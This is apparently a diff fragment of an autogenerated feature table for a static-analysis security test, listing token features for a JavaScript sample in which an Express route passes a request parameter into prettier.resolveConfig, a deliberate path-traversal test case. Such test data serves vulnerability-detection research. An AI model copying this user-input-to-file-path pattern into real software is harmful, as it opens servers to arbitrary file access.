autogenerated/TaintedPath/prettier.js:4:13:4:21 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:4:13:4:21 | exceptional return of express() | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:4:13:4:21 | express() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:4:13:4:21 | express() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:4:13:4:21 | express() | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:5:1:5:3 | app | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:5:1:5:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:5:1:5:3 | app | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:5:1:5:7 | app.get | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:5:1:5:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:5:1:5:7 | app.get | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:5:1:14:2 | app.get ... });\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:5:1:14:2 | app.get ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:5:1:14:2 | app.get ... });\\n}) | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:5:1:14:2 | exceptional return of app.get ... });\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:5:1:14:2 | exceptional return of app.get ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:5:1:14:2 | exceptional return of app.get ... });\\n}) | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:5:5:5:7 | get | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:5:5:5:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:5:5:5:7 | get | fileImports | express prettier | | autogenerated/TaintedPath/prettier.js:5:9:5:20 | '/some/path' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/prettier.js:5:9:5:20 | '/some/path' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/prettier.js:5:9:5:20 | '/some/path' | calleeImports | express | @@ -10300,6 +82175,26 @@ tokenFeatures | autogenerated/TaintedPath/prettier.js:5:9:5:20 | '/some/path' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/prettier.js:5:9:5:20 | '/some/path' | fileImports | express prettier | | autogenerated/TaintedPath/prettier.js:5:9:5:20 | '/some/path' | receiverName | app | +| autogenerated/TaintedPath/prettier.js:5:23:5:22 | prettier | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:5:23:5:22 | prettier | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:5:23:5:22 | prettier | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:5:23:5:22 | prettier | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:5:23:5:22 | prettier | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:5:23:5:22 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:5:23:5:22 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:5:23:5:22 | this | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:5:23:5:22 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:5:23:5:22 | this | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:5:23:14:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:5:23:14:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:5:23:14:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:5:23:14:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:5:23:14:1 | 'arguments' object of anonymous function | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:5:23:14:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:5:23:14:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:5:23:14:1 | exceptional return of anonymous function | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:5:23:14:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:5:23:14:1 | exceptional return of anonymous function | fileImports | express prettier | | autogenerated/TaintedPath/prettier.js:5:23:14:1 | functio ... });\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/prettier.js:5:23:14:1 | functio ... });\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/prettier.js:5:23:14:1 | functio ... });\\n} | calleeImports | express | @@ -10307,6 +82202,116 @@ tokenFeatures | autogenerated/TaintedPath/prettier.js:5:23:14:1 | functio ... });\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/prettier.js:5:23:14:1 | functio ... });\\n} | fileImports | express prettier | | autogenerated/TaintedPath/prettier.js:5:23:14:1 | functio ... });\\n} | receiverName | app | +| autogenerated/TaintedPath/prettier.js:5:23:14:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:5:23:14:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:5:23:14:1 | return of anonymous function | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:5:23:14:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:5:23:14:1 | return of anonymous function | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:5:33:5:35 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:5:33:5:35 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:5:33:5:35 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:5:33:5:35 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:5:33:5:35 | req | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:5:33:5:35 | req | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:5:33:5:35 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:5:33:5:35 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:5:33:5:35 | req | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:5:33:5:35 | req | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:5:38:5:40 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:5:38:5:40 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:5:38:5:40 | res | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:5:38:5:40 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:5:38:5:40 | res | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:6:11:6:15 | { p } | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:6:11:6:15 | { p } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:6:11:6:15 | { p } | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:6:11:6:15 | { p } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:6:11:6:15 | { p } | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:6:11:6:28 | p | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:6:11:6:28 | p | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:6:11:6:28 | p | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:6:11:6:28 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:6:11:6:28 | p | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:6:11:6:28 | { p } = req.params | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:6:11:6:28 | { p } = req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:6:11:6:28 | { p } = req.params | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:6:11:6:28 | { p } = req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:6:11:6:28 | { p } = req.params | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:6:13:6:13 | p | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:6:19:6:21 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:6:19:6:21 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:6:19:6:21 | req | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:6:19:6:21 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:6:19:6:21 | req | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:6:19:6:28 | req.params | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:6:19:6:28 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:6:19:6:28 | req.params | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:6:19:6:28 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:6:19:6:28 | req.params | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:6:23:6:28 | params | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:6:23:6:28 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:6:23:6:28 | params | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:6:23:6:28 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:6:23:6:28 | params | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:7:5:7:12 | prettier | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:7:5:7:12 | prettier | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:7:5:7:12 | prettier | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:7:5:7:12 | prettier | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:7:5:7:12 | prettier | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:7:5:7:26 | prettie ... eConfig | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:7:5:7:26 | prettie ... eConfig | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:7:5:7:26 | prettie ... eConfig | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:7:5:7:26 | prettie ... eConfig | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:7:5:7:26 | prettie ... eConfig | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:7:5:7:29 | exceptional return of prettie ... nfig(p) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:7:5:7:29 | exceptional return of prettie ... nfig(p) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:7:5:7:29 | exceptional return of prettie ... nfig(p) | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:7:5:7:29 | exceptional return of prettie ... nfig(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:7:5:7:29 | exceptional return of prettie ... nfig(p) | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:7:5:7:29 | prettie ... nfig(p) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:7:5:7:29 | prettie ... nfig(p) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:7:5:7:29 | prettie ... nfig(p) | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:7:5:7:29 | prettie ... nfig(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:7:5:7:29 | prettie ... nfig(p) | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:7:5:7:34 | prettie ... p).then | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:7:5:7:34 | prettie ... p).then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:7:5:7:34 | prettie ... p).then | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:7:5:7:34 | prettie ... p).then | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:7:5:7:34 | prettie ... p).then | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:7:5:9:6 | exceptional return of prettie ... \\n }) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:7:5:9:6 | exceptional return of prettie ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:7:5:9:6 | exceptional return of prettie ... \\n }) | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:7:5:9:6 | exceptional return of prettie ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:7:5:9:6 | exceptional return of prettie ... \\n }) | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:7:5:9:6 | prettie ... \\n }) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:7:5:9:6 | prettie ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:7:5:9:6 | prettie ... \\n }) | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:7:5:9:6 | prettie ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:7:5:9:6 | prettie ... \\n }) | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:7:14:7:26 | resolveConfig | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:7:14:7:26 | resolveConfig | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:7:14:7:26 | resolveConfig | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:7:14:7:26 | resolveConfig | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:7:14:7:26 | resolveConfig | fileImports | express prettier | | autogenerated/TaintedPath/prettier.js:7:28:7:28 | p | CalleeFlexibleAccessPath | prettier.resolveConfig | | autogenerated/TaintedPath/prettier.js:7:28:7:28 | p | InputArgumentIndex | 0 | | autogenerated/TaintedPath/prettier.js:7:28:7:28 | p | calleeImports | prettier | @@ -10316,6 +82321,21 @@ tokenFeatures | autogenerated/TaintedPath/prettier.js:7:28:7:28 | p | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/prettier.js:7:28:7:28 | p | fileImports | express prettier | | autogenerated/TaintedPath/prettier.js:7:28:7:28 | p | receiverName | prettier | +| autogenerated/TaintedPath/prettier.js:7:31:7:34 | then | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:7:31:7:34 | then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/prettier.js:7:31:7:34 | then | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:7:31:7:34 | then | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:7:31:7:34 | then | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:7:36:7:35 | prettier | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:7:36:7:35 | prettier | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:7:36:7:35 | prettier | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:7:36:7:35 | prettier | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:7:36:7:35 | prettier | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:7:36:9:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:7:36:9:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:7:36:9:5 | 'arguments' object of anonymous function | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:7:36:9:5 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:7:36:9:5 | 'arguments' object of anonymous function | fileImports | express prettier | | autogenerated/TaintedPath/prettier.js:7:36:9:5 | (option ... ;\\n } | CalleeFlexibleAccessPath | prettier.resolveConfig().then | | autogenerated/TaintedPath/prettier.js:7:36:9:5 | (option ... ;\\n } | InputArgumentIndex | 0 | | autogenerated/TaintedPath/prettier.js:7:36:9:5 | (option ... ;\\n } | calleeImports | prettier | @@ -10324,6 +82344,61 @@ tokenFeatures | autogenerated/TaintedPath/prettier.js:7:36:9:5 | (option ... ;\\n } | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | | autogenerated/TaintedPath/prettier.js:7:36:9:5 | (option ... ;\\n } | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/prettier.js:7:36:9:5 | (option ... ;\\n } | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:7:36:9:5 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:7:36:9:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:7:36:9:5 | exceptional return of anonymous function | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:7:36:9:5 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:7:36:9:5 | exceptional return of anonymous function | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:7:36:9:5 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:7:36:9:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:7:36:9:5 | return of anonymous function | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:7:36:9:5 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:7:36:9:5 | return of anonymous function | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:7:37:7:43 | options | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:7:37:7:43 | options | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:7:37:7:43 | options | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:7:37:7:43 | options | contextSurroundingFunctionParameters | (req, res)\n(options) | +| autogenerated/TaintedPath/prettier.js:7:37:7:43 | options | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:7:37:7:43 | options | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:7:37:7:43 | options | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:7:37:7:43 | options | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:7:37:7:43 | options | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:7:37:7:43 | options | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:8:15:8:23 | formatted | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:8:15:8:23 | formatted | contextSurroundingFunctionParameters | (req, res)\n(options) | +| autogenerated/TaintedPath/prettier.js:8:15:8:23 | formatted | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:8:15:8:23 | formatted | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:8:15:8:23 | formatted | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:8:15:8:57 | formatt ... ptions) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:8:15:8:57 | formatt ... ptions) | contextSurroundingFunctionParameters | (req, res)\n(options) | +| autogenerated/TaintedPath/prettier.js:8:15:8:57 | formatt ... ptions) | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:8:15:8:57 | formatt ... ptions) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:8:15:8:57 | formatt ... ptions) | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:8:27:8:34 | prettier | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:8:27:8:34 | prettier | contextSurroundingFunctionParameters | (req, res)\n(options) | +| autogenerated/TaintedPath/prettier.js:8:27:8:34 | prettier | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:8:27:8:34 | prettier | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:8:27:8:34 | prettier | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:8:27:8:41 | prettier.format | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:8:27:8:41 | prettier.format | contextSurroundingFunctionParameters | (req, res)\n(options) | +| autogenerated/TaintedPath/prettier.js:8:27:8:41 | prettier.format | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:8:27:8:41 | prettier.format | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:8:27:8:41 | prettier.format | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:8:27:8:57 | exceptional return of prettie ... ptions) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:8:27:8:57 | exceptional return of prettie ... ptions) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/prettier.js:8:27:8:57 | exceptional return of prettie ... ptions) | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:8:27:8:57 | exceptional return of prettie ... ptions) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:8:27:8:57 | exceptional return of prettie ... ptions) | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:8:27:8:57 | prettie ... ptions) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:8:27:8:57 | prettie ... ptions) | contextSurroundingFunctionParameters | (req, res)\n(options) | +| autogenerated/TaintedPath/prettier.js:8:27:8:57 | prettie ... ptions) | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:8:27:8:57 | prettie ... ptions) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:8:27:8:57 | prettie ... ptions) | fileImports | express prettier | +| autogenerated/TaintedPath/prettier.js:8:36:8:41 | format | contextFunctionInterfaces | | +| autogenerated/TaintedPath/prettier.js:8:36:8:41 | format | contextSurroundingFunctionParameters | (req, res)\n(options) | +| autogenerated/TaintedPath/prettier.js:8:36:8:41 | format | enclosingFunctionBody | req res p req params prettier resolveConfig p then options formatted prettier format foo options prettier resolveConfig foo config p then options formatted prettier format bar options | +| autogenerated/TaintedPath/prettier.js:8:36:8:41 | format | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/prettier.js:8:36:8:41 | format | fileImports | express prettier | | autogenerated/TaintedPath/prettier.js:8:43:8:47 | "foo" | CalleeFlexibleAccessPath | prettier.format | | autogenerated/TaintedPath/prettier.js:8:43:8:47 | "foo" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/prettier.js:8:43:8:47 | "foo" | calleeImports | prettier | @@ -10342,6 +82417,46 @@ tokenFeatures | autogenerated/TaintedPath/prettier.js:8:50:8:56 | options | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/prettier.js:8:50:8:56 | options | fileImports | express prettier | | 